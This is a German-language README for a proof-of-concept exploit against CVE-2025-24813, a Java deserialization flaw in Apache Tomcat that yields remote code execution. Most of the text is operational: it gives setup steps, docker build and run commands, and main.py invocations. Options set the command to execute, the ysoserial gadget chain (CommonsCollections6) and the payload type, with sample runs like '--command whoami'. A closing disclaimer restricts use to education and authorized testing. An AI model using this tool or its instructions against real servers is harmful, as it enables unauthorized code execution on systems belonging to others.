
Proof-of-concept-Exploit für CVE-2025-24813, eine Java-Deserialisierungsschwachstelle in Apache Tomcat. Generiert bösartige serialisierte Payloads und lädt sie als Session-Dateien hoch, um eine entfernte Codeausführung auszulösen.
Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2025-24813, eine Java-Deserialisierungsschwachstelle in Apache Tomcat.
Basiert auf absholi7ly/POC-CVE-2025-24813/.
Abhängigkeiten installieren:
uv venv
source .venv/bin/activate
uv sync
ysoserial herunterladen:
./download.sh
Erstellen und Ausführen des Exploits in einem Container:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
Führen Sie den Exploit direkt aus:
python main.py <target_url> [options]
--command: Auszuführender Befehl (Standard: calc.exe)--ysoserial: Pfad zu ysoserial.jar (Standard: ./ysoserial-all.jar)--gadget: ysoserial-Gadget-Chain (Standard: CommonsCollections6)--payload_type: Payload-Typ - ysoserial oder java (Standard: ysoserial)--no-ssl-verify: SSL-Überprüfung deaktivieren# Grundlegende Verwendung
python main.py http://target:8080
# Benutzerdefinierter Befehl
python main.py http://target:8080 --command "whoami"
# Java-Payload anstelle von ysoserial verwenden
python main.py http://target:8080 --payload_type java
Dieses Tool ist nur für Bildungszwecke und autorisierte Tests bestimmt. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.